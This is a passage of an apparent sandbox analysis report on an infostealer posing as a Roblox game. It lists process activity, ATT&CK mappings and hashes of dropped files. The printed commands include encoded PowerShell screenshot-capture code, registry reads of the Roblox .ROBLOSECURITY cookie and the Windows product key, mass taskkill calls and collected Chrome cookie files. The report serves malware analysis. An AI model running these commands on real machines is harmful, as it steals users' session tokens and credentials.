AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5444
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzn1p5b2\hzn1p5b2.cmdline"
        5⤵
        
        PID:5996
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA50B.tmp" "c:\Users\Admin\AppData\Local\Temp\hzn1p5b2\CSC179E2FCDC158456F98BE1DF126C91C81.TMP"
        6⤵
        
        PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5596
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5792
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5876
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5952
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1840"
    3⤵
    PID:3640
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1840
      4⤵
      Kills process with taskkill
      PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4448"
    3⤵
    PID:2100
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4448
      4⤵
      Kills process with taskkill
      PID:5212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"
    3⤵
    PID:5240
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2784
      4⤵
      Kills process with taskkill
      PID:1428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2884"
    3⤵
    PID:5480
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2884
      4⤵
      Kills process with taskkill
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2532"
    3⤵
    PID:5428
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2532
      4⤵
      Kills process with taskkill
      PID:1412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 996"
    3⤵
    PID:2416
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 996
      4⤵
      Kills process with taskkill
      PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1140"
    3⤵
    PID:5852
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1140
      4⤵
      Kills process with taskkill
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3752"
    3⤵
    PID:5376
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3752
      4⤵
      Kills process with taskkill
      PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3344"
    3⤵
    PID:1072
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3344
      4⤵
      Kills process with taskkill
      PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3612"
    3⤵
    PID:6012
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3612
      4⤵
      Kills process with taskkill
      PID:5956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:6064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4948
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4264
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1232

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ ‏‏ \System\Clipboard.txt
1⤵
PID:5476

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ ‏‏ \System\Task List.txt
1⤵
PID:1868

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ ‏‏ \System\System Info.txt
1⤵
PID:5700

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ ‏‏ \Credentials\Chrome\Chrome Cookies.txt
1⤵
PID:2416

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ ‏‏ \Credentials\Chrome\Chrome History.txt
1⤵
PID:5672

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
PID:4180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
7803e707523dfc4fddd6a757c31e2552

SHA1
442d815329a8e46cecab639055bda110e6169add

SHA256
5d908fe29e3121c02ba827e24c76efa8c3b83404aa6ca8b9b006ccd427714494

SHA512
8bc2e818b192f5ead4e7be36f673aa41eed7acbde1e05f1f94bf1597f71a8436e387b4809161ea3747412488c79ebc0cb4a7313ab703ddfbc2412cf1d873ed95

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
0518083bf36dabfc5ca7957508caad42

SHA1
93459d12ae0d986daea0cde5692e964d25df1f19

SHA256
2727aed061ebf999e236ed509c0e91df098bcf5e21c6076bb51e6344b897d606

SHA512
b329d7123fd9f734368fd6d7bb5f7c9a4ccfd0a6baef45c657490735a7f858adf5cc8e7d390932439669ffee390ecc1a9dfda1d883a2ebba9d15485337cb6723

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
85a96d5509a7b6073c0a80c80a213c98

SHA1
4cb94b2f26153a96fc9ad03c635a7774becf37ad

SHA256
a40db7cd39c6f7dd53e88aa5e03cdccb78087310135eefa3de6b9eddd0316233

SHA512
4413c2e0df758c88a208dae56e99149c564e59dc1cc7756eb79ae5ac90a54d15b2a4bc5593e5317af9bb8f8aa7a6ffaed53775c81fd71de3e85ce6d2914dab67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7efe55aa06f3e0ae0f56934501851764

SHA1
76bc439f7e043765cde15a01f3d5342436d5406c

SHA256
4ae823514f4f19bf625aa1bb195fe891f39cf2ec7956091a2539f79e566c4caf

SHA512
2db840b1ed6179f3078fa2f2bfdcff3d8985297b0c9763448c160fd65c70938228369f99dbe4a32b7b2f1e0d555600494c7f87a8bc582cde846222ae73c4850f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
b96ad7c10cf6e567761551cf9f3280b9

SHA1
873ac059baf34d0695e30bb65dbb805a12f3ff10

SHA256
d90e8f37e41bd048dc233ab98ccd129a729ffc7e0414bdc265e00b42405f4fff

SHA512
c9a08d8d67941b78f06335e46aea5a6488ce815255d05e6689789d154200ed447bac5215166cbaccbd788733caf287787f53dfaf6180e3538b3f220016589fe6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
51998b5405f6ae202928200c2a5f4ee0

SHA1
94fb6f7143f3117b70c5301009d60268e4e9cfab

SHA256
51a481ce3ae911d38083001dc8a585887e6580836a186ffb5c3048683b348433

SHA512
e4cdc4301fe4f3fb3946e4611d2ff1839b99d4e363d2e4226dc85bf141fc1ac1a881d371c1de753b0da77a7ada4a09c8125be0298b9b9e7cd732a78028290c20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
22dde889bd47368c15d9d18e940a88b0

SHA1
a85fb92269a67fe8e79e40f20246185fe6723699

SHA256
3ef4e8b569f1cabb07114cf4f4556115c6e44352c923c8d098b1f532c7763c49

SHA512
2561e438546916ff1d9fc62c98cfc82ca8bbb710d962eea9e9cc3154dddc34114da8d4084d0e6b530fe11942fab85775f6a92e9286705a40eef9cbff726bda09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
937797f39845fbda4f0b3fb17c0cb235

SHA1
b41ee8601e75615b7a4e22a1505b17ed7afc9db6

SHA256
d7a8f845c2065e902f81739f204adc92a3b10bf3a34dd3afdc8643168d175e49

SHA512
c41bb1a3ff68a1ab9663a73f4426e853965f346b52c854021cd3aa922ddcdc9e1e38c3126c7f617757b0d425b9acd29497bd432c7c03c383a6cbe7dcf1729a78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
c627e5539bf786848a943a61b8d7eb08

SHA1
01b7ff5417ed784c58add242f18792d30bc8e910

SHA256
ae328330005ef1678ac4080839c365631da2c43fed9dc8c743d98d33278b8a6b

SHA512
d4e17714e3b59b1f75b29e09d7ab98966b736a8f92b4415de73e0587f26c05c1904ff546fe176acc667f81ac5bd17be2ef8a616b8fe95802322ff0e387864741

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
47557deca4600ebc6a0cc16179ebef51

SHA1
1a47f89d6f64f9015259f0b6b8b3627239c262da

SHA256
0a5bf1f0ef6457eb3f4ef12044f5c9f2914672c09ac774c60d8d65a32e3f71ee

SHA512
9e550a2d442832a83d3e7ca0e6a18e546107ade533cd3df7b8e164ffe35485942bf58ceab54e4aaea73a34438847936c1a35d782fc9cfd23cf01fa7f962ca189

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
0a9854ad46ff15035f6253d6601958d4

SHA1
20615dda99b4c756330292c8b121ffc3ba8f4961

SHA256
40cf91dfb8f2f7a0ba1ebb7bbfae1f7b86eeffb0e4d4ccf642aee2960317c324

SHA512
b50d4becf2026ab0f19f77b4a7ce064a590d0a352f1c622c3d1ceb1585579f02ba6ab1db79bbfa41d17b7f309066378d8cf35a01eed360c7a2bcf387d3207c39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
85KB

MD5
986ff480564abcff86ada7949986c6e3

SHA1
9b394a34aa198a8440af8eb13290d0ef0d2aa881

SHA256
70b7d2851d85780378e1955b577a0f271eff6af27825a2f57e3cfb8accac167f

SHA512
4765e484e5d64f996186c88109246df7ea4a1eb6597a3a341481da9ee70bba24da77fd76d06c6ac1eecc7dacd4273f46c0e23fecb3da633701d5b1ebd0208e38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59dd56.TMP

Filesize
83KB

MD5
3b2c4546cea0eb8b27aa9ab97a6b64d1

SHA1
5ba7a8cb648359625a77b4033f8ca77ef4c3ff1f

SHA256
5f9bcdeb2ebcd2e0856d68ee534ab526c0f350998424d3f5038bb95b5c015123

SHA512
7068851edcf73853fc7d9125e84ae04c264d0e89552e9cdda80d8fc6c6c0000eaf4212cd40d0a719817523a7c04beae5daae521ef3df9a8db0d37969d224ff6c

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
6e2dd918b2c22ec9d38424b34577d88b

SHA1
ce9b5ec7934ace13a02d64f494ec8cf6de8ce5c9

SHA256
037e7f2cd9d518cafd37f55edee61feac13b4dfdd35f67b41d7af525d93b7f0f

SHA512
fe292b07ea0f7db690e00640f29b5cf7de32ddcdc887c24075801e1b7ad756e94dab31e297efff6c9def49ec3ac20e22c71ba40afb7e4fb75bf0678b64328eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe

Filesize
8.5MB

MD5
049690a7ad5481a5615d3943700795cb

SHA1
185cb4020b9eda09d2ac9b4caa7f6493f7072b80

SHA256
b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

SHA512
465027b5bf59517f0a696fcddd5b6dea59e49e5de8d784f135d1f8134f0550ea39813b94e88637481683822db37b3f965e55fddecb6b432ba1afff7f48fa947f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46322\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46322\VCRUNTIME140_1.dll

Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_asyncio.pyd

Filesize
69KB

MD5
28d2a0405be6de3d168f28109030130c

SHA1
7151eccbd204b7503f34088a279d654cfe2260c9

SHA256
2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d

SHA512
b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_bz2.pyd

Filesize
83KB

MD5
223fd6748cae86e8c2d5618085c768ac

SHA1
dcb589f2265728fe97156814cbe6ff3303cd05d3

SHA256
f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

SHA512
9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_cffi_backend.cp312-win_amd64.pyd

Filesize
178KB

MD5
